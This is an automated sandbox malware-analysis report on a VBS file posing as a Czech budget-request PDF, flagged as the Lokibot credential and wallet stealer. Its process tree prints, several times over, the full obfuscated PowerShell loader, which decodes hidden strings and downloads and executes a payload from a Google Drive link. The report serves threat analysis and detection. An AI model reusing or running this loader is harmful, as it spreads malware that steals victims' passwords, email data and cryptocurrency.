Overview

overview

10

Static

static

1

ŽÁDOST O...df.vbs

windows7-x64

10

ŽÁDOST O...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2024 21:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs

  • Size

    35KB

  • MD5

    fa21d757a727ace9fab8ba22e03f7dc5

  • SHA1

    edaa3726683853a70e8176f2368e3254192a9a11

  • SHA256

    b8911aa1f56a7803220464354c15dbdce5c70d0b66b03bd0aba25c0155f2f161

  • SHA512

    3aaee7bc7a1726c193c36362d952c64eae4dc49ef2946bf430d8367cc012317ee7de3a761d3d079af72b8ce61d029b19f8fa3f24e1d8ba4d46064e0301f60925

  • SSDEEP

    384:3ccI8+xqQKYYKmlKCKQakPsZOqP1tVzFdk4GL283f48QihlTCEAZpdk/yKR:sc+AnjlKCKgE77V0z7lTCEAZIDR

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
        3⤵
          PID:1328
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:1940
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg 